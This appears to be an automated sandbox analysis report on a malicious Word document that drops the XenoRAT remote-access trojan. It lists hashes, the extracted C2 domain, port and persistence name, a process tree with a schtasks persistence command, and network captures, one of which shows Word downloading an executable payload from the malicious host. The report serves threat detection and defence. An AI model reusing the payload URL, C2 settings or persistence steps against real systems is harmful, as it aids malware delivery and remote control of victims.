Analysis
-
max time kernel
150s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
11-12-2024 09:46
Behavioral task
behavioral1
Sample
ec6627e48bb4c56abbb2a4563072e631.doc
Resource
win7-20240729-en
General
-
Target
ec6627e48bb4c56abbb2a4563072e631.doc
-
Size
191KB
-
MD5
ec6627e48bb4c56abbb2a4563072e631
-
SHA1
9e237643473c67940eb359bba09825114c7bc726
-
SHA256
548212f42d5dc4965db354d6ce075422dcb3331a213fb0b5b662e08e59234829
-
SHA512
4fb47dcf9e0fe13e038a88cc8c9e06ff1dde996d69281c505a07c3d4cc591e32770c1df8dac3da8d031f4868073ebde8202a7173dfd369b016aa2c69af2385a3
-
SSDEEP
3072:Q877VGZ5Sd3b4e0wNZtsqXNKd5AvDJW4S+I/tZ6X1bpF6m+3b:9GZYwAZHMCDJ8/u5pAm0b
Malware Config
Extracted
xenorat
dns.stipamana.com
Xeno_rat_nd8912d
-
delay
12000
-
install_path
appdata
-
port
4567
-
startup_name
mrec
Signatures
-
Detect XenoRat Payload 1 IoCs
resource yara_rule behavioral2/memory/4120-96-0x0000000000400000-0x0000000000412000-memory.dmp family_xenorat -
Xenorat family
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation RUSYZH.exe -
Executes dropped EXE 8 IoCs
pid Process 2388 RUSYZH.exe 4120 RUSYZH.exe 1672 RUSYZH.exe 5100 RUSYZH.exe 1160 RUSYZH.exe 3068 RUSYZH.exe 4548 RUSYZH.exe 1808 RUSYZH.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 2388 set thread context of 4120 2388 RUSYZH.exe 87 PID 2388 set thread context of 1672 2388 RUSYZH.exe 88 PID 2388 set thread context of 5100 2388 RUSYZH.exe 89 PID 1160 set thread context of 3068 1160 RUSYZH.exe 94 PID 1160 set thread context of 4548 1160 RUSYZH.exe 95 PID 1160 set thread context of 1808 1160 RUSYZH.exe 96 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 1496 5100 WerFault.exe 89 -
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RUSYZH.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RUSYZH.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RUSYZH.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RUSYZH.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RUSYZH.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RUSYZH.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RUSYZH.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3276 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 1560 WINWORD.EXE 1560 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe 1672 RUSYZH.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2388 RUSYZH.exe Token: SeDebugPrivilege 1160 RUSYZH.exe Token: SeDebugPrivilege 1672 RUSYZH.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 1560 WINWORD.EXE 1560 WINWORD.EXE 1560 WINWORD.EXE 1560 WINWORD.EXE 1560 WINWORD.EXE 1560 WINWORD.EXE 1560 WINWORD.EXE -
Suspicious use of WriteProcessMemory 57 IoCs
description pid Process procid_target PID 1560 wrote to memory of 2388 1560 WINWORD.EXE 85 PID 1560 wrote to memory of 2388 1560 WINWORD.EXE 85 PID 1560 wrote to memory of 2388 1560 WINWORD.EXE 85 PID 2388 wrote to memory of 4120 2388 RUSYZH.exe 87 PID 2388 wrote to memory of 4120 2388 RUSYZH.exe 87 PID 2388 wrote to memory of 4120 2388 RUSYZH.exe 87 PID 2388 wrote to memory of 4120 2388 RUSYZH.exe 87 PID 2388 wrote to memory of 4120 2388 RUSYZH.exe 87 PID 2388 wrote to memory of 4120 2388 RUSYZH.exe 87 PID 2388 wrote to memory of 4120 2388 RUSYZH.exe 87 PID 2388 wrote to memory of 4120 2388 RUSYZH.exe 87 PID 2388 wrote to memory of 1672 2388 RUSYZH.exe 88 PID 2388 wrote to memory of 1672 2388 RUSYZH.exe 88 PID 2388 wrote to memory of 1672 2388 RUSYZH.exe 88 PID 2388 wrote to memory of 1672 2388 RUSYZH.exe 88 PID 2388 wrote to memory of 1672 2388 RUSYZH.exe 88 PID 2388 wrote to memory of 1672 2388 RUSYZH.exe 88 PID 2388 wrote to memory of 1672 2388 RUSYZH.exe 88 PID 2388 wrote to memory of 1672 2388 RUSYZH.exe 88 PID 2388 wrote to memory of 5100 2388 RUSYZH.exe 89 PID 2388 wrote to memory of 5100 2388 RUSYZH.exe 89 PID 2388 wrote to memory of 5100 2388 RUSYZH.exe 89 PID 2388 wrote to memory of 5100 2388 RUSYZH.exe 89 PID 2388 wrote to memory of 5100 2388 RUSYZH.exe 89 PID 2388 wrote to memory of 5100 2388 RUSYZH.exe 89 PID 2388 wrote to memory of 5100 2388 RUSYZH.exe 89 PID 2388 wrote to memory of 5100 2388 RUSYZH.exe 89 PID 4120 wrote to memory of 1160 4120 RUSYZH.exe 93 PID 4120 wrote to memory of 1160 4120 RUSYZH.exe 93 PID 4120 wrote to memory of 1160 4120 RUSYZH.exe 93 PID 1160 wrote to memory of 3068 1160 RUSYZH.exe 94 PID 1160 wrote to memory of 3068 1160 RUSYZH.exe 94 PID 1160 wrote to memory of 3068 1160 RUSYZH.exe 94 PID 1160 wrote to memory of 3068 1160 RUSYZH.exe 94 PID 1160 wrote to memory of 3068 1160 RUSYZH.exe 94 PID 1160 wrote to memory of 3068 1160 RUSYZH.exe 94 PID 1160 wrote to memory of 3068 1160 RUSYZH.exe 94 PID 1160 wrote to memory of 3068 1160 RUSYZH.exe 94 PID 1160 wrote to memory of 4548 1160 RUSYZH.exe 95 PID 1160 wrote to memory of 4548 1160 RUSYZH.exe 95 PID 1160 wrote to memory of 4548 1160 RUSYZH.exe 95 PID 1160 wrote to memory of 4548 1160 RUSYZH.exe 95 PID 1160 wrote to memory of 4548 1160 RUSYZH.exe 95 PID 1160 wrote to memory of 4548 1160 RUSYZH.exe 95 PID 1160 wrote to memory of 4548 1160 RUSYZH.exe 95 PID 1160 wrote to memory of 4548 1160 RUSYZH.exe 95 PID 1160 wrote to memory of 1808 1160 RUSYZH.exe 96 PID 1160 wrote to memory of 1808 1160 RUSYZH.exe 96 PID 1160 wrote to memory of 1808 1160 RUSYZH.exe 96 PID 1160 wrote to memory of 1808 1160 RUSYZH.exe 96 PID 1160 wrote to memory of 1808 1160 RUSYZH.exe 96 PID 1160 wrote to memory of 1808 1160 RUSYZH.exe 96 PID 1160 wrote to memory of 1808 1160 RUSYZH.exe 96 PID 1160 wrote to memory of 1808 1160 RUSYZH.exe 96 PID 1672 wrote to memory of 3276 1672 RUSYZH.exe 103 PID 1672 wrote to memory of 3276 1672 RUSYZH.exe 103 PID 1672 wrote to memory of 3276 1672 RUSYZH.exe 103
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ec6627e48bb4c56abbb2a4563072e631.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1560 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\RUSYZH.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\RUSYZH.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2388 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\RUSYZH.exeC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\RUSYZH.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4120 -
C:\Users\Admin\AppData\Roaming\UpdateManager\RUSYZH.exe"C:\Users\Admin\AppData\Roaming\UpdateManager\RUSYZH.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1160 -
C:\Users\Admin\AppData\Roaming\UpdateManager\RUSYZH.exeC:\Users\Admin\AppData\Roaming\UpdateManager\RUSYZH.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3068
-
-
C:\Users\Admin\AppData\Roaming\UpdateManager\RUSYZH.exeC:\Users\Admin\AppData\Roaming\UpdateManager\RUSYZH.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4548
-
-
C:\Users\Admin\AppData\Roaming\UpdateManager\RUSYZH.exeC:\Users\Admin\AppData\Roaming\UpdateManager\RUSYZH.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1808
-
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\RUSYZH.exeC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\RUSYZH.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1672 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /Create /TN "mrec" /XML "C:\Users\Admin\AppData\Local\Temp\tmpCC49.tmp" /F4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3276
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\RUSYZH.exeC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\RUSYZH.exe3⤵
- Executes dropped EXE
PID:5100 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5100 -s 804⤵
- Program crash
PID:1496
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5100 -ip 51001⤵PID:4508
Network
-
Remote address:8.8.8.8:53Request228.249.119.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestroaming.officeapps.live.comIN AResponseroaming.officeapps.live.comIN CNAMEprod.roaming1.live.com.akadns.netprod.roaming1.live.com.akadns.netIN CNAMEeur.roaming1.live.com.akadns.neteur.roaming1.live.com.akadns.netIN CNAMEfrc-azsc-000.roaming.officeapps.live.comfrc-azsc-000.roaming.officeapps.live.comIN CNAMEosiprod-frc-buff-azsc-000.francecentral.cloudapp.azure.comosiprod-frc-buff-azsc-000.francecentral.cloudapp.azure.comIN A52.109.68.129
-
Remote address:52.109.68.129:443RequestPOST /rs/RoamingSoapService.svc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/xml; charset=utf-8
User-Agent: MS-WebServices/1.0
SOAPAction: "http://tempuri.org/IRoamingSettingsService/GetConfig"
Content-Length: 511
Host: roaming.officeapps.live.com
ResponseHTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/10.0
X-OfficeFE: RoamingFE_IN_363
X-OfficeVersion: 16.0.18315.30575
X-OfficeCluster: frc-000.roaming.officeapps.live.com
Content-Security-Policy-Report-Only: script-src 'nonce-K6elRgAT3DqKzsOlZaz6me0L9V/8U4ep1h9CNfpu0Pw/ODMmRe95PTj5D1SLebtDP5jUOkITL49GBu7Upiahx9CaVCcL2ZWwU/+7Rbwi3mLFf8DoT6cKIAee2sL8qWM0lz2g7xkDvyYvfnuCUh1RCPoqrlpCzRtS7FVh0/53nF8=' 'unsafe-inline' 'unsafe-eval' 'strict-dynamic' https:; base-uri 'self'; object-src 'none'; require-trusted-types-for 'script'; report-uri https://csp.microsoft.com/report/OfficeIce-OfficeRoaming-Prod
X-CorrelationId: cb7fc9c5-4350-4d44-9407-05face7d72ae
X-Powered-By: ASP.NET
Date: Wed, 11 Dec 2024 09:46:27 GMT
Content-Length: 654
-
Remote address:8.8.8.8:53Requestwww.stipamana.comIN AResponsewww.stipamana.comIN A94.156.167.57
-
GEThttps://www.stipamana.com/tysrerterseyuerthreytwsydtryerytsrt/gszgdargaerwgsergtsegregwa/ghtghdfgstrsrththsgthw/adzhtcfdhxfxgh.exeWINWORD.EXERemote address:94.156.167.57:443RequestGET /tysrerterseyuerthreytwsydtryerytsrt/gszgdargaerwgsergtsegregwa/ghtghdfgstrsrththsgthw/adzhtcfdhxfxgh.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: www.stipamana.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Wed, 11 Dec 2024 09:46:28 GMT
Content-Type: application/octet-stream
Content-Length: 137216
Last-Modified: Wed, 11 Dec 2024 05:44:57 GMT
Connection: keep-alive
Keep-Alive: timeout=60
ETag: "675926d9-21800"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Accept-Ranges: bytes
-
Remote address:8.8.8.8:53Requestr10.o.lencr.orgIN AResponser10.o.lencr.orgIN CNAMEo.lencr.edgesuite.neto.lencr.edgesuite.netIN CNAMEa1887.dscq.akamai.neta1887.dscq.akamai.netIN A88.221.134.137a1887.dscq.akamai.netIN A88.221.135.105a1887.dscq.akamai.netIN A88.221.135.97a1887.dscq.akamai.netIN A88.221.134.144a1887.dscq.akamai.netIN A88.221.135.114a1887.dscq.akamai.netIN A88.221.134.115
-
GEThttp://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgQUsVgYl9LUpmCNM7IJkm3dFg%3D%3DWINWORD.EXERemote address:88.221.134.137:80RequestGET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgQUsVgYl9LUpmCNM7IJkm3dFg%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: r10.o.lencr.org
ResponseHTTP/1.1 200 OK
Content-Type: application/ocsp-response
Content-Length: 504
ETag: "79E03F91CD6E7129DCDC2E05D5346BDA380DF73D99C46BFCEEFEC6E0436B6503"
Last-Modified: Wed, 11 Dec 2024 05:48:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=7287
Expires: Wed, 11 Dec 2024 11:47:55 GMT
Date: Wed, 11 Dec 2024 09:46:28 GMT
Connection: keep-alive
-
Remote address:8.8.8.8:53Request129.68.109.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request23.159.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request57.167.156.94.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request168.245.100.95.in-addr.arpaIN PTRResponse168.245.100.95.in-addr.arpaIN PTRa95-100-245-168deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request137.134.221.88.in-addr.arpaIN PTRResponse137.134.221.88.in-addr.arpaIN PTRa88-221-134-137deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request12.173.189.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request196.249.167.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestmetadata.templates.cdn.office.netIN AResponsemetadata.templates.cdn.office.netIN CNAMEtemplatesmetadata.office.nettemplatesmetadata.office.netIN CNAMEtemplatesmetadata.office.net.edgekey.nettemplatesmetadata.office.net.edgekey.netIN CNAMEe26769.dscb.akamaiedge.nete26769.dscb.akamaiedge.netIN A92.123.26.202e26769.dscb.akamaiedge.netIN A92.123.26.161
-
GEThttps://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527>ype=0%2C1%2C2%2C5%2CWINWORD.EXERemote address:92.123.26.202:443RequestGET /client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527>ype=0%2C1%2C2%2C5%2C HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: metadata.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Server: Kestrel
Content-Encoding: gzip
Content-Length: 1264
Cache-Control: max-age=66042
Date: Wed, 11 Dec 2024 09:46:42 GMT
Connection: keep-alive
Vary: Accept-Encoding
-
Remote address:8.8.8.8:53Requestbinaries.templates.cdn.office.netIN AResponsebinaries.templates.cdn.office.netIN CNAMEbinaries.templates.cdn.office.net.edgesuite.netbinaries.templates.cdn.office.net.edgesuite.netIN CNAMEa1847.dscg2.akamai.neta1847.dscg2.akamai.netIN A2.19.252.161a1847.dscg2.akamai.netIN A2.19.252.143
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp02835233.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: xFXEvEvsng2mfE0eU+RtWg==
Last-Modified: Fri, 22 Apr 2016 16:09:25 GMT
ETag: 0x8D36AC879BBB45C
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: bcca83ea-301e-000c-1015-b91d22000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:42 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp01840907.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 2jOARYFw5gy+pyYC/dDZVQ==
Last-Modified: Fri, 22 Apr 2016 16:08:15 GMT
ETag: 0x8D36AC84F8E1FB0
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d47d4a02-201e-00a9-0e0f-ba4b58000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:42 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp03328884.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: q78QzulIDkHYEnfpU4+Yyw==
Last-Modified: Fri, 22 Apr 2016 16:10:17 GMT
ETag: 0x8D36AC8987823BE
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f3206081-b01e-0002-7f97-a03492000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:42 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp02851216.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: YoYxJM3NoTXswOcieCy4iA==
Last-Modified: Fri, 22 Apr 2016 16:09:38 GMT
ETag: 0x8D36AC8813CE0D3
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 4196af4e-901e-003f-4990-2d48e6000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:42 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp0309043001.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: DrxFqg5nzENdB0VDg3H5SA==
Last-Modified: Wed, 29 Aug 2018 18:20:24 GMT
ETag: 0x8D60DDC169CBCB0
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 875b64ee-b01e-0079-1097-a05123000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:42 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp02851217.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: UYBOJVxXMXYDn01bVcEqsg==
Last-Modified: Fri, 22 Apr 2016 16:09:38 GMT
ETag: 0x8D36AC881987151
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 0171b447-f01e-005b-359a-1db97e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:42 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp02851218.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: kqgZ1DSoquosZfDMLzO7Og==
Last-Modified: Fri, 22 Apr 2016 16:09:39 GMT
ETag: 0x8D36AC881E66CE5
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7ac92116-501e-008c-3524-b9e224000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:42 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp0403393701.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
